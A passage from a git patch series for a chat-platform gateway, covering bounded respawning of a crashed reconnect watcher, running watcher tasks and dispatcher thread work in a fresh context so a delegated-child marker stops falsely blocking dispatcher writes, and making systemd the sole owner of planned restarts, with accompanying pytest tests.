asyncio.create_task(_alive()) + runner._reconnect_watcher_task = live + try: + assert runner._queue_retryable_fatal_platform(self._fatal_adapter()) is False + assert spawned == [], "a live watcher must never be respawned" + assert runner._reconnect_watcher_task is live + finally: + live.cancel() + try: + await live + except asyncio.CancelledError: + pass From e173720774470138ed222d173ec78ce018b7ad3d Mon Sep 17 00:00:00 2001 From: Jack Lau <72348727+jackulau@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:41:59 -0500 Subject: [PATCH 146/161] fix(gateway): give supervision exhaustion an owner for queued platforms Review of #90448 by @andrexibiza: adding _ensure_reconnect_watcher_running() to the already-queued branch of a fatal callback is still an event-coupled check. It needs a later fatal error from some other platform to arrive, and #81036 makes that less likely rather than more -- it publishes the queue before disconnect and drops the failed adapter from the live map, so after the watcher's supervised restart budget is spent there may be no adapter left to emit the event recovery is waiting on. That is the state #72366 (salvage of #71867 by @ygd58) restored supervision to close: queued work exists, the watcher is dead, and nobody owns the invariant. Supervision being finite is correct; having no owner past the budget is not. _spawn_supervised now takes on_give_up, invoked when it abandons a task -- the supervisor is the only thing that knows it has. The reconnect watcher uses it to hold: while _running and _failed_platforms is non-empty, either a reconnect watcher is live or a bounded respawn is scheduled. Empty queue: leave it down and log; the enqueue path spawns a fresh watcher the moment something depends on one. Non-empty: a bounded slow tier at _RECONNECT_WATCHER_SLOW_RETRY_SECS (300s) for _MAX_SLOW_WATCHER_RESPAWNS (6) attempts, standing down early if the queue drains or a watcher returns on its own. Exhausted: one loud error naming the platforms left unattended. The ceiling is (1 + _MAX_SUPERVISED_RESTARTS) x (1 + _MAX_SLOW_WATCHER_RESPAWNS) spawns -- 42 across at least half an hour -- because each slow attempt hands the watcher a fresh supervised budget. A test asserts that ceiling so it cannot quietly become a restart loop. Deliberately NOT included: requesting a process restart when the slow tier is also exhausted. Taking down every healthy platform to heal a sick one is a blast-radius policy decision for a maintainer. Two things this turned up: - _spawn_supervised did not thread on_give_up through its own backoff respawn, so the callback was lost after the first restart and the give-up branch had no owner at exactly the moment it needed one -- the same defect the on_spawn docstring warns about, one parameter over. - Three call sites repeated the (factory, name, on_spawn) triple, whose on_spawn half is load-bearing. They now go through _spawn_reconnect_watcher(). _supervised_backoff() names the previously-inline exponential schedule so the exhaustion tests can collapse it; production behaviour is unchanged. Refs #90386 --- gateway/run.py | 167 ++++++++++++++++++-- tests/gateway/test_platform_reconnect.py | 189 +++++++++++++++++++++++ 2 files changed, 344 insertions(+), 12 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index 00cfd13dab..c973c2a029 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -13387,11 +13387,7 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew # live task even when _spawn_supervised's own backoff respawns it — so # _ensure_reconnect_watcher_running never mistakes a superseded handle # for a dead watcher and spawns a duplicate. - self._reconnect_watcher_task = self._spawn_supervised( - self._platform_reconnect_watcher, - "platform_reconnect_watcher", - on_spawn=lambda t: setattr(self, "_reconnect_watcher_task", t), - ) + self._spawn_reconnect_watcher() # Start background handoff watcher — picks up CLI sessions marked # handoff_state='pending' in state.db and re-binds them to the @@ -13456,7 +13452,22 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew # handoff for the rest of the process life). _SUPERVISED_HEALTHY_SECS = 300 - def _spawn_supervised(self, coro_factory, name, *, restart=True, _attempt=0, on_spawn=None): + @staticmethod + def _supervised_backoff(attempt: int) -> float: + """Delay before the supervisor's next respawn, in seconds. + + Capped exponential. A method rather than an inline expression so the + schedule has one name, and so a test can collapse it -- the ordering + of crash / give-up / slow-tier is what the exhaustion tests assert, + and sleeping through the real curve to observe it would make them + take minutes. + """ + return min(60, 2 ** min(attempt, 6)) + + def _spawn_supervised( + self, coro_factory, name, *, restart=True, _attempt=0, on_spawn=None, + on_give_up=None, + ): """Launch a long-lived background task with task-level supervision. Complements upstream's per-iteration inner-loop try/except (which only @@ -13479,6 +13490,17 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew supervisor's own respawn creates a new task without updating that external handle, so ``_ensure_...`` later sees the stale/done handle and spawns a SECOND concurrent watcher (double reconnect attempts). + + ``on_give_up`` (optional) is invoked with ``name`` when supervision is + abandoned — the restart budget is spent and this task will never be + respawned by the supervisor again. Supervision being finite is correct; + having no owner of the invariant afterwards is not. A task that still + has queued work depending on it needs somewhere to hand that fact to, + and before this hook existed the only thing standing between budget + exhaustion and a permanent silent outage was a *later, unrelated + event* happening to call ``_ensure_...`` (#90386). This is the + supervisor telling its caller "I am done; the invariant is yours now", + which is a thing only the supervisor knows. """ if getattr(self, "_background_tasks", None) is None: self._background_tasks = set() @@ -13537,8 +13559,16 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew effective_attempt, self._SUPERVISED_HEALTHY_SECS, ) + if on_give_up is not None: + try: + on_give_up(name) + except Exception: # pragma: no cover - defensive + logger.debug( + "on_give_up callback for %s raised", + name, exc_info=True, + ) return - backoff = min(60, 2 ** min(effective_attempt, 6)) + backoff = self._supervised_backoff(effective_attempt) async def _respawn(): await asyncio.sleep(backoff) @@ -13549,6 +13579,12 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew restart=restart, _attempt=effective_attempt + 1, on_spawn=on_spawn, + # Must be threaded through the recursion for the + # same reason on_spawn is: the give-up that + # matters is the LAST respawn's, and a callback + # dropped here would leave the exhaustion branch + # with no owner at exactly the moment it needs one. + on_give_up=on_give_up, ) respawn_task = asyncio.create_task(_respawn()) @@ -14268,6 +14304,117 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew # self state, so inheriting the mixin keeps every self._kanban_* call site # working unchanged while lifting ~1,000 LOC out of this file. + #: Interval of the slow respawn tier that takes over once the reconnect + #: watcher has exhausted its supervised restart budget. Long on purpose: + #: the budget is spent precisely when the watcher is crashing on contact, + #: so the useful cadence is "check back later", not "try again now". A + #: tight loop here would be worse than the outage it is healing. + _RECONNECT_WATCHER_SLOW_RETRY_SECS = 300 + + #: How many slow-tier respawns to attempt while work is still queued. + #: Bounded, not infinite: if half an hour of five-minute retries cannot + #: keep a watcher alive, the fault is not transient and a louder failure + #: is more useful than a quieter one that never stops. + _MAX_SLOW_WATCHER_RESPAWNS = 6 + + def _on_reconnect_watcher_gave_up(self, name: str = "") -> None: + """Own the reconnect invariant once supervision has abandoned it. + + The invariant this closes: **while the gateway is running and + ``_failed_platforms`` is non-empty, either a reconnect watcher is live + or a bounded respawn is scheduled.** + + Before this, the only thing that noticed a dead watcher was a *later + fatal error from some other platform* reaching + ``_queue_retryable_fatal_platform``. That is event-coupled recovery: it + needs an event that, by construction, may never come. #81036 moved + queue publication ahead of disconnect and drops the failed adapter from + the live map, so once the watcher's budget is spent there may be no + adapter left that can emit the event recovery was waiting on. The + platform stays queued, nothing retries it, and the stranded check in + ``_handle_adapter_fatal_error_detached`` treats a queued platform as + safe — so the process is never restarted either. + + Deliberately NOT done here: requesting a supervisor/process restart + when the slow tier is also exhausted. That is a policy decision about + blast radius (a gateway serving healthy platforms would be taken down + to heal a sick one) and it belongs to a maintainer, not to this patch. + What happens instead is a single loud error naming the still-queued + platforms, which is the state an operator or an external supervisor can + act on. + """ + if not getattr(self, "_running", False): + return + if not getattr(self, "_failed_platforms", None): + # No queued work depends on the watcher. Letting it stay dead is + # correct -- the enqueue path spawns a fresh one the moment a + # platform is queued again. + logger.warning( + "Reconnect watcher supervision exhausted with an empty retry " + "queue — leaving it down until a platform is queued." + ) + return + self._schedule_slow_reconnect_watcher_respawn(attempt=0) + + def _schedule_slow_reconnect_watcher_respawn(self, *, attempt: int) -> None: + """Bounded slow-tier respawn of the reconnect watcher.""" + if attempt >= self._MAX_SLOW_WATCHER_RESPAWNS: + logger.error( + "Reconnect watcher could not be kept alive after %d slow " + "respawns; %d platform(s) remain queued and unattended: %s. " + "Manual intervention or a gateway restart is required.", + attempt, + len(self._failed_platforms), + ", ".join(str(p) for p in self._failed_platforms), + ) + return + + async def _slow_respawn() -> None: + await asyncio.sleep(self._RECONNECT_WATCHER_SLOW_RETRY_SECS) + if not getattr(self, "_running", False): + return + if not getattr(self, "_failed_platforms", None): + # The queue drained while we waited -- something else healed + # it. Nothing to own any more. + return + task = getattr(self, "_reconnect_watcher_task", None) + if task is not None and not task.done(): + return # a watcher came back on its own; stand down + logger.warning( + "Reconnect watcher still down with %d platform(s) queued — " + "slow respawn %d/%d", + len(self._failed_platforms), + attempt + 1, + self._MAX_SLOW_WATCHER_RESPAWNS, + ) + self._spawn_reconnect_watcher( + on_give_up=lambda _name: self._schedule_slow_reconnect_watcher_respawn( + attempt=attempt + 1 + ) + ) + + respawn_task = asyncio.create_task(_slow_respawn()) + if getattr(self, "_background_tasks", None) is None: + self._background_tasks = set() + self._background_tasks.add(respawn_task) + respawn_task.add_done_callback(self._background_tasks.discard) + + def _spawn_reconnect_watcher(self, *, on_give_up=None): + """Single place that knows how to launch the reconnect watcher. + + Three call sites used to repeat this triple (factory, name, on_spawn), + and the ``on_spawn`` half of it is load-bearing: without it the + supervisor's own respawn leaves ``_reconnect_watcher_task`` pointing at + a dead handle and ``_ensure_...`` spawns a second concurrent watcher. + """ + self._reconnect_watcher_task = self._spawn_supervised( + self._platform_reconnect_watcher, + "platform_reconnect_watcher", + on_spawn=lambda t: setattr(self, "_reconnect_watcher_task", t), + on_give_up=on_give_up or self._on_reconnect_watcher_gave_up, + ) + return self._reconnect_watcher_task + def _ensure_reconnect_watcher_running(self) -> None: """Ensure the platform reconnect watcher background task is alive. @@ -14289,11 +14436,7 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew "Reconnect watcher task is dead (done=%s) — respawning", task.done() if task is not None else "N/A", ) - self._reconnect_watcher_task = self._spawn_supervised( - self._platform_reconnect_watcher, - "platform_reconnect_watcher", - on_spawn=lambda t: setattr(self, "_reconnect_watcher_task", t), - ) + self._spawn_reconnect_watcher() async def _platform_reconnect_watcher(self) -> None: """Background task that periodically retries connecting failed platforms. diff --git a/tests/gateway/test_platform_reconnect.py b/tests/gateway/test_platform_reconnect.py index bf00b570f2..8b100eebcf 100644 --- a/tests/gateway/test_platform_reconnect.py +++ b/tests/gateway/test_platform_reconnect.py @@ -998,3 +998,192 @@ class TestRequeueHealsDeadReconnectWatcher: await live except asyncio.CancelledError: pass + + +class TestSupervisionExhaustionHasAnOwner: + """The witness @andrexibiza asked for on #90448: recovery with NO new event. + + The predecessor architecture (#72366, salvage of #71867 by @ygd58) + established that a reconnect watcher which dies while work is queued must + be respawned by something *autonomous*, because the only other trigger -- + a fresh fatal error from another platform -- may never arrive. Supervised + restart closed that, but supervision is finite: after + ``_MAX_SUPERVISED_RESTARTS`` rapid crashes it logs "giving up restarts" and + stops. + + Past that point the system is back in exactly the state #72366 described. + And #81036 (salvage of #80700, preserving @HexLab98) makes the missing + event less likely rather than more: it publishes the queue *before* + disconnect and drops the failed adapter from the live map, so there may be + no adapter left to emit the callback recovery was waiting on. + + These tests exercise that state directly. They queue a platform, let the + watcher burn its whole budget, and then emit **no further fatal + callbacks at all** -- the thing the branch-level regression tests below + cannot prove, because they manufacture the event. + """ + + @staticmethod + def _runner(monkeypatch, *, crashes): + """A runner whose reconnect watcher crashes `crashes` times, then lives.""" + runner = _make_runner() + runner._background_tasks = set() + runner._reconnect_watcher_task = None + runner.state = {"live": 0, "spawns": 0} + + # Collapse every real-time delay: the point is the ORDER of events, not + # their spacing. Left as class attributes in production precisely so a + # test can do this without sleeping for half an hour. + monkeypatch.setattr(GatewayRunner, "_MAX_SUPERVISED_RESTARTS", 2) + monkeypatch.setattr(GatewayRunner, "_SUPERVISED_HEALTHY_SECS", 3600) + monkeypatch.setattr(GatewayRunner, "_RECONNECT_WATCHER_SLOW_RETRY_SECS", 0) + monkeypatch.setattr(GatewayRunner, "_supervised_backoff", staticmethod(lambda _a: 0)) + + remaining = {"n": crashes} + + async def _watcher(): + runner.state["spawns"] += 1 + if remaining["n"] > 0: + remaining["n"] -= 1 + raise RuntimeError("watcher crashed on contact") + # Healthy: stay alive so `task.done()` is False. + runner.state["live"] += 1 + await asyncio.Event().wait() + + runner._platform_reconnect_watcher = _watcher + return runner + + @staticmethod + def _queue_telegram(runner): + runner._failed_platforms[Platform.TELEGRAM] = { + "config": runner.config.platforms[Platform.TELEGRAM], + "attempts": 9, + "next_retry": time.monotonic() + 300, + "queued_at": time.monotonic() - 7200, + "credential_claim": None, + "listener_claim": None, + } + + @staticmethod + async def _settle(times=40): + """Let the supervisor's done-callbacks and respawn tasks drain.""" + for _ in range(times): + await asyncio.sleep(0) + + @pytest.mark.asyncio + async def test_watcher_recovers_after_budget_exhaustion_with_no_new_event( + self, monkeypatch + ): + """The whole review gate in one test. + + Queue a platform, crash the watcher past its supervised budget, then do + nothing at all -- no fatal callback, no enqueue, no external poke. The + watcher must come back on its own once it stops crashing. + """ + # One crash more than supervision will tolerate, so the give-up branch + # is genuinely reached and the slow tier is what recovers it. + runner = self._runner(monkeypatch, crashes=3) + self._queue_telegram(runner) + + runner._spawn_reconnect_watcher() + await self._settle(300) + + assert runner.state["live"] == 1, ( + "with no new fatal event, only the slow tier can have brought the " + "watcher back after supervision gave up" + ) + assert runner._reconnect_watcher_task is not None + assert not runner._reconnect_watcher_task.done() + + runner._running = False + for task in list(runner._background_tasks): + task.cancel() + + @pytest.mark.asyncio + async def test_the_slow_tier_is_bounded_not_a_restart_loop(self, monkeypatch): + """A watcher that never recovers must stop being respawned, and say so.""" + runner = self._runner(monkeypatch, crashes=10_000) + self._queue_telegram(runner) + monkeypatch.setattr(GatewayRunner, "_MAX_SLOW_WATCHER_RESPAWNS", 3) + + runner._spawn_reconnect_watcher() + await self._settle(400) + + assert runner.state["live"] == 0 + # Bounded, and the arithmetic is worth stating because it is the + # whole safety argument. Each slow-tier attempt hands the watcher a + # FRESH supervised budget -- that is deliberate, since a slow retry is + # a new bet that conditions have changed -- so the ceiling is + # (1 + _MAX_SUPERVISED_RESTARTS) x (1 + _MAX_SLOW_WATCHER_RESPAWNS): + # here (1+2) x (1+3) = 12. With production values that is 6 x 7 = 42 + # spawns spread across at least half an hour, which is a ladder, not + # a restart loop. A tight loop here would be worse than the outage it + # is healing. + assert runner.state["spawns"] == 12, ( + f"expected a finite spawn ladder, got {runner.state['spawns']}" + ) + assert runner._reconnect_watcher_task.done() + + # And it stays stopped: no further spawns once the ladder is spent. + await self._settle(400) + assert runner.state["spawns"] == 12 + + runner._running = False + for task in list(runner._background_tasks): + task.cancel() + + @pytest.mark.asyncio + async def test_an_empty_queue_leaves_the_watcher_down(self, monkeypatch): + """No queued work, no invariant to own. + + Respawning a crash-looping watcher that nothing depends on would burn + the process for no one. The enqueue path spawns a fresh one the moment + a platform is actually queued. + """ + runner = self._runner(monkeypatch, crashes=10_000) + assert not runner._failed_platforms + + runner._spawn_reconnect_watcher() + await self._settle(200) + + assert runner.state["live"] == 0 + assert runner._reconnect_watcher_task.done() + + runner._running = False + for task in list(runner._background_tasks): + task.cancel() + + @pytest.mark.asyncio + async def test_the_slow_tier_stands_down_when_the_queue_drains(self, monkeypatch): + """Something else healed the platform -- stop respawning for it.""" + runner = self._runner(monkeypatch, crashes=10_000) + self._queue_telegram(runner) + + runner._spawn_reconnect_watcher() + # Let supervision give up, then drain the queue before the slow tier + # gets its turn. + await self._settle(6) + runner._failed_platforms.clear() + await self._settle(200) + + assert runner.state["live"] == 0, ( + "with nothing queued, the slow tier has no invariant left to own" + ) + + runner._running = False + for task in list(runner._background_tasks): + task.cancel() + + @pytest.mark.asyncio + async def test_give_up_does_nothing_once_the_gateway_is_shutting_down( + self, monkeypatch + ): + runner = self._runner(monkeypatch, crashes=10_000) + self._queue_telegram(runner) + runner._running = False + + runner._on_reconnect_watcher_gave_up("platform_reconnect_watcher") + await self._settle() + + assert runner.state["live"] == 0 + assert not runner._background_tasks From bf3a0bb99d348416fd17cf3574da3d1d730fb88f Mon Sep 17 00:00:00 2001 From: fangliquan Date: Sat, 22 Aug 2026 09:13:01 +0800 Subject: [PATCH 147/161] fix(gateway): isolate supervised watcher contexts --- gateway/run.py | 21 ++++++++++++++++----- tests/gateway/test_platform_reconnect.py | 22 ++++++++++++++++++++++ 2 files changed, 38 insertions(+), 5 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index c973c2a029..90de3e880f 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -42,7 +42,7 @@ import threading import time import traceback from collections import OrderedDict -from contextvars import copy_context +from contextvars import Context, copy_context from pathlib import Path from datetime import datetime, timedelta, timezone from typing import Awaitable, Callable, Dict, Optional, Any, List, Tuple, Union, cast @@ -13483,6 +13483,12 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew ``_SUPERVISED_HEALTHY_SECS`` — so a long-lived daemon that crashes occasionally over days is never permanently abandoned. + Each watcher starts in a fresh ``Context``. These are process-level + services, not continuations of whichever message turn happened to + spawn them; inheriting a delegated-child marker would make the Kanban + dispatcher reject its own writes when ``asyncio.to_thread`` copies the + watcher's context. + ``on_spawn`` (optional) is invoked with the freshly-created task on every spawn, INCLUDING internal backoff respawns. Callers that also track the live handle elsewhere (e.g. ``self._reconnect_watcher_task`` @@ -13509,9 +13515,11 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew # uses it to distinguish a rapid crash-loop from a healthy-run-then-crash. _started = time.monotonic() - # Deliberately do NOT pass name= to create_task — some test doubles mock - # create_task with a signature that rejects the name kwarg. - task = asyncio.create_task(coro_factory()) + # Deliberately do NOT pass kwargs to create_task — some test doubles + # mock it with a narrow signature. Calling it from a fresh Context has + # the same isolation semantics as create_task(..., context=Context()) + # while preserving that compatibility. + task = Context().run(lambda: asyncio.create_task(coro_factory())) # Mark this as a PERMANENT supervised watcher, not transient background # WORK. The scale-to-zero idle check must ignore these: supervised # watchers (session-expiry, kanban, reconnect, the scale-to-zero watcher @@ -13587,7 +13595,10 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew on_give_up=on_give_up, ) - respawn_task = asyncio.create_task(_respawn()) + # The done callback retains the context in which it was + # registered, so isolate the backoff task too; otherwise a + # restart could reintroduce the original caller's turn scope. + respawn_task = Context().run(lambda: asyncio.create_task(_respawn())) self._background_tasks.add(respawn_task) respawn_task.add_done_callback(self._background_tasks.discard) diff --git a/tests/gateway/test_platform_reconnect.py b/tests/gateway/test_platform_reconnect.py index 8b100eebcf..7564f99ffe 100644 --- a/tests/gateway/test_platform_reconnect.py +++ b/tests/gateway/test_platform_reconnect.py @@ -445,6 +445,28 @@ class TestPlatformSlashCommand: class TestSpawnSupervised: """Verify the task-level supervision wrapper around watcher launches.""" + @pytest.mark.asyncio + async def test_watcher_does_not_inherit_delegated_child_context(self): + """Long-lived gateway services must not inherit one turn's child scope.""" + from agent.delegation_context import ( + delegated_child_context, + is_delegated_child_context, + ) + + runner = _make_runner() + observed = [] + + async def _watcher(): + observed.append(is_delegated_child_context()) + + with delegated_child_context(): + assert is_delegated_child_context() is True + task = runner._spawn_supervised(_watcher, "isolated_watcher") + await task + assert is_delegated_child_context() is True + + assert observed == [False] + @pytest.mark.asyncio async def test_clean_synchronous_return_is_not_respawned(self): # A supervised coro that returns immediately (clean exit) must be From f12cd040151ec485b953ae0a9f30abdcbb260f70 Mon Sep 17 00:00:00 2001 From: fangliquan Date: Sat, 22 Aug 2026 13:25:14 +0800 Subject: [PATCH 148/161] fix(gateway): isolate kanban dispatcher to_thread context Spawn-time Context isolation cannot rewrite an already-running watcher task. Run dispatcher SQLite offloads in an empty Context so write_txn no longer false-trips after delegate_task, while real child callers still hit the mutation guard. --- gateway/kanban_watchers.py | 26 ++++++++++++++++++++---- tests/gateway/test_platform_reconnect.py | 24 ++++++++++++++++++++++ 2 files changed, 46 insertions(+), 4 deletions(-) diff --git a/gateway/kanban_watchers.py b/gateway/kanban_watchers.py index eb267c10ac..45504eb866 100644 --- a/gateway/kanban_watchers.py +++ b/gateway/kanban_watchers.py @@ -15,6 +15,7 @@ import logging import os import sqlite3 import time +from contextvars import Context from pathlib import Path from typing import Any, Callable, Optional @@ -73,6 +74,23 @@ def _kanban_dispatch_allowed() -> bool: return not check_paused("kanban", logger) +def _run_in_fresh_context(func: Callable[..., Any], /, *args: Any) -> Any: + """Run *func* in an empty ``Context`` so request-local ContextVars stay behind. + + ``asyncio.to_thread`` copies the calling task's context onto the worker + thread. Supervised Kanban ticks are process-owned writers; if that copy + still carries a ``delegate_task`` child marker (spawn-time snapshot or a + later polluted task), ``write_txn`` false-trips. An empty Context keeps + the DB guard intact for real children without exempting dispatcher writes. + """ + return Context().run(func, *args) + + +async def _to_thread_process_service(func: Callable[..., Any], /, *args: Any) -> Any: + """Offload blocking dispatcher work without inheriting request-local ContextVars.""" + return await asyncio.to_thread(_run_in_fresh_context, func, *args) + + def _acquire_singleton_lock(lock_path) -> "tuple[Optional[object], str]": """Take an exclusive, non-blocking advisory lock for the sole dispatcher. @@ -1681,7 +1699,7 @@ class GatewayKanbanWatchersMixin: try: # Reap zombie children before per-board work so a board DB # failure cannot block cleanup of unrelated workers. - pids = await asyncio.to_thread(_kb.reap_worker_zombies) + pids = await _to_thread_process_service(_kb.reap_worker_zombies) if pids: logger.info( "kanban dispatcher: reaped %d zombie worker(s), pids=%s", @@ -1704,8 +1722,8 @@ class GatewayKanbanWatchersMixin: # takes effect on the next tick, not on gateway restart (#49638). _ad_enabled, _ad_per_tick = _read_auto_decompose_settings() if _ad_enabled: - await asyncio.to_thread(_auto_decompose_tick, _ad_per_tick) - results = await asyncio.to_thread(_tick_once) + await _to_thread_process_service(_auto_decompose_tick, _ad_per_tick) + results = await _to_thread_process_service(_tick_once) any_spawned = False for slug, res in (results or []): if res is not None and getattr(res, "spawned", None): @@ -1724,7 +1742,7 @@ class GatewayKanbanWatchersMixin: len(res.auto_blocked) if hasattr(res.auto_blocked, "__len__") else 0, ) # Health telemetry (aggregate across boards) - ready_pending = await asyncio.to_thread(_ready_nonempty) + ready_pending = await _to_thread_process_service(_ready_nonempty) if ready_pending and not any_spawned: bad_ticks += 1 else: diff --git a/tests/gateway/test_platform_reconnect.py b/tests/gateway/test_platform_reconnect.py index 7564f99ffe..e0c4e4a955 100644 --- a/tests/gateway/test_platform_reconnect.py +++ b/tests/gateway/test_platform_reconnect.py @@ -467,6 +467,30 @@ class TestSpawnSupervised: assert observed == [False] + @pytest.mark.asyncio + async def test_dispatcher_to_thread_does_not_trip_kanban_guard(self): + """Already-running ticks copy the caller task context into to_thread. + + Issue #91958 is a dispatcher that was spawned at boot, then a later + ``delegate_task`` leaves the worker copy marked as a child. Spawn + isolation does not rewrite that frozen task context; the offload + helper must scrub it at the tick boundary. The in-task child guard + stays closed. + """ + from agent.delegation_context import ( + delegated_child_context, + is_delegated_child_context, + ) + from gateway.kanban_watchers import _to_thread_process_service + from hermes_cli.kanban_db import _assert_not_delegated_child_mutation + + with delegated_child_context(): + assert is_delegated_child_context() is True + with pytest.raises(PermissionError, match="delegate_task child"): + _assert_not_delegated_child_mutation() + await _to_thread_process_service(_assert_not_delegated_child_mutation) + assert is_delegated_child_context() is True + @pytest.mark.asyncio async def test_clean_synchronous_return_is_not_respawned(self): # A supervised coro that returns immediately (clean exit) must be From 5b024c7cccb75e52d40d276315561447d6ce7a5e Mon Sep 17 00:00:00 2001 From: fangliquanflq Date: Sat, 22 Aug 2026 06:13:28 +0800 Subject: [PATCH 149/161] fix(gateway): make systemd the sole restart owner --- gateway/run.py | 119 +---------------------- hermes_cli/gateway.py | 25 +---- tests/hermes_cli/test_gateway_service.py | 14 +-- 3 files changed, 13 insertions(+), 145 deletions(-) diff --git a/gateway/run.py b/gateway/run.py index 90de3e880f..f3cffd185a 100644 --- a/gateway/run.py +++ b/gateway/run.py @@ -11592,101 +11592,6 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew start_new_session=True, ) - def _launch_systemd_restart_shortcut(self) -> None: - """Best-effort helper to bypass systemd's automatic restart delay. - - For planned in-chat restarts, the gateway exits cleanly so systemd does - not record a failure. However, units with RestartSteps still count - automatic restarts and can delay repeated /restart tests. A transient - user service survives our cgroup teardown and explicitly starts the - gateway as soon as this PID exits, while the unit keeps its normal - backoff for real crash loops. - """ - if sys.platform != "linux" or not os.environ.get("INVOCATION_ID"): - return - - try: - import shutil - import subprocess - - systemd_run = shutil.which("systemd-run") - systemctl = shutil.which("systemctl") - if not systemd_run or not systemctl: - return - - try: - from hermes_cli.gateway import get_service_name - - service_name = get_service_name() - except Exception: - service_name = "hermes-gateway" - - current_pid = os.getpid() - - # Detect whether the gateway unit is registered as a system or - # user service. Daemon-style deployments are typically system - # units (e.g. /etc/systemd/system/hermes-gateway.service), while - # `hermes setup` under a non-root account may register a user - # unit. Hard-coding ``--user`` broke system-unit deployments: - # systemctl returned an empty MainPID, the PID-equality check - # below failed, and the planned-restart helper was never - # launched — leaving the gateway dead until a manual reboot. - def _query_pid(scope_flags): - try: - out = subprocess.run( - [systemctl, *scope_flags, "show", service_name, - "--property=MainPID", "--value"], - capture_output=True, text=True, encoding="utf-8", errors="replace", timeout=2, - ) - return (out.stdout or "").strip() - except Exception: - return "" - - system_pid = _query_pid([]) - user_pid = _query_pid(["--user"]) - if str(current_pid) == system_pid: - scope_flags = [] - systemctl_scope = "systemctl" - elif str(current_pid) == user_pid: - scope_flags = ["--user"] - systemctl_scope = "systemctl --user" - else: - # MainPID does not match in either scope — likely invoked - # outside of systemd or the unit was renamed. Bail out - # rather than restart the wrong unit. - return - - service_arg = shlex.quote(service_name) - shell_cmd = ( - f"while kill -0 {current_pid} 2>/dev/null; do sleep 0.2; done; " - f"{systemctl_scope} reset-failed {service_arg}; " - f"{systemctl_scope} restart {service_arg}" - ) - unit_name = f"{service_name}-planned-restart-{current_pid}".replace(".", "-") - subprocess.Popen( - [ - systemd_run, - *scope_flags, - "--collect", - "--unit", - unit_name, - "/bin/sh", - "-lc", - shell_cmd, - ], - stdout=subprocess.DEVNULL, - stderr=subprocess.DEVNULL, - start_new_session=True, - ) - logger.info( - "Launched systemd planned-restart helper for %s (pid=%s, scope=%s)", - service_name, - current_pid, - "user" if scope_flags else "system", - ) - except Exception as e: - logger.debug("Failed to launch systemd planned-restart helper: %s", e) - def _wedged_agent_count(self) -> int: """Count running chat agents already past the inactivity timeout. @@ -15310,25 +15215,11 @@ class GatewayRunner(GatewayAuthorizationMixin, GatewayKanbanWatchersMixin, Gatew logger.debug("Failed to write planned restart notification marker: %s", e) if self._restart_requested and self._restart_via_service: - self._launch_systemd_restart_shortcut() - # Always exit with TEMPFAIL (75) on service-managed - # restarts. The shortcut helper above is best-effort and - # commonly fails on real deployments: non-root gateway - # units hit Polkit denials when invoking ``systemd-run - # --system``, headless boxes have no user bus for - # ``--user``, and operator-managed unit files may use - # ``Restart=on-failure`` rather than ``Restart=always``. - # Exit 75 paired with ``RestartForceExitStatus=75`` makes - # systemd treat the planned restart as a controlled - # failure and revive the unit via ``Restart=on-failure``, - # regardless of whether the helper survived. Without - # this, a clean exit (0) on Linux left the gateway dead - # until someone rebooted the host. Only the planned code - # (75) is whitelisted via ``RestartForceExitStatus``; a - # genuine crash exits non-zero-but-not-75, so real crash - # loops are still governed by the unit's normal - # ``Restart=``/``RestartSec`` (and any StartLimit the - # operator sets) rather than force-restarted here. + # The service manager is the sole restart owner. Exit 75 + # paired with ``RestartForceExitStatus=75`` asks systemd to + # replace this process without a second helper racing the + # unit's stop/start job. launchd likewise treats the planned + # non-zero exit as restartable. self._exit_code = GATEWAY_SERVICE_RESTART_EXIT_CODE self._exit_reason = self._exit_reason or "Gateway restart requested" diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py index 1d0bf451ab..fed0e98c7f 100644 --- a/hermes_cli/gateway.py +++ b/hermes_cli/gateway.py @@ -4121,26 +4121,11 @@ def systemd_restart(system: bool = False): f"waiting up to {wait_budget:.0f}s for in-flight turns + drain..." ) if _graceful_restart_via_sigusr1(pid, wait_budget): - # The gateway exits with code 75 for a planned service restart. - # RestartSec can otherwise delay the relaunch even though the - # operator asked for an immediate restart, so kick the unit once - # the old PID has exited and then wait for the replacement PID. - _run_systemctl( - ["reset-failed", svc], - system=system, - check=False, - timeout=30, - ) - _run_systemctl( - ["restart", svc], - system=system, - check=False, - timeout=90, - ) - if _wait_for_systemd_service_restart(system=system, previous_pid=pid): - return - if _systemd_service_is_start_limited(system=system): - return + # Exit 75 transfers restart ownership to systemd. Observe that + # single replacement instead of issuing another restart that can + # stop the process systemd has already brought up. + _wait_for_systemd_service_restart(system=system, previous_pid=pid) + return print( f"⚠ Graceful restart did not complete within {int(wait_budget)}s; " diff --git a/tests/hermes_cli/test_gateway_service.py b/tests/hermes_cli/test_gateway_service.py index b5ef198a18..02e4566e48 100644 --- a/tests/hermes_cli/test_gateway_service.py +++ b/tests/hermes_cli/test_gateway_service.py @@ -734,16 +734,10 @@ class TestGatewaySystemServiceRouting: lambda pid, timeout: calls.append(("graceful", pid, timeout)) or True, ) - # Simulate systemctl reset-failed/restart followed by an active unit. - # A plain start does not break systemd's auto-restart timer once the - # old gateway has exited with the planned restart code. + # Once SIGUSR1 makes the gateway exit with the planned restart code, + # systemd is the only restart owner. The CLI must only observe the + # replacement instead of issuing a second stop/start transition. def fake_subprocess_run(cmd, **kwargs): - if "reset-failed" in cmd: - calls.append(("reset-failed", cmd)) - return SimpleNamespace(stdout="", returncode=0) - 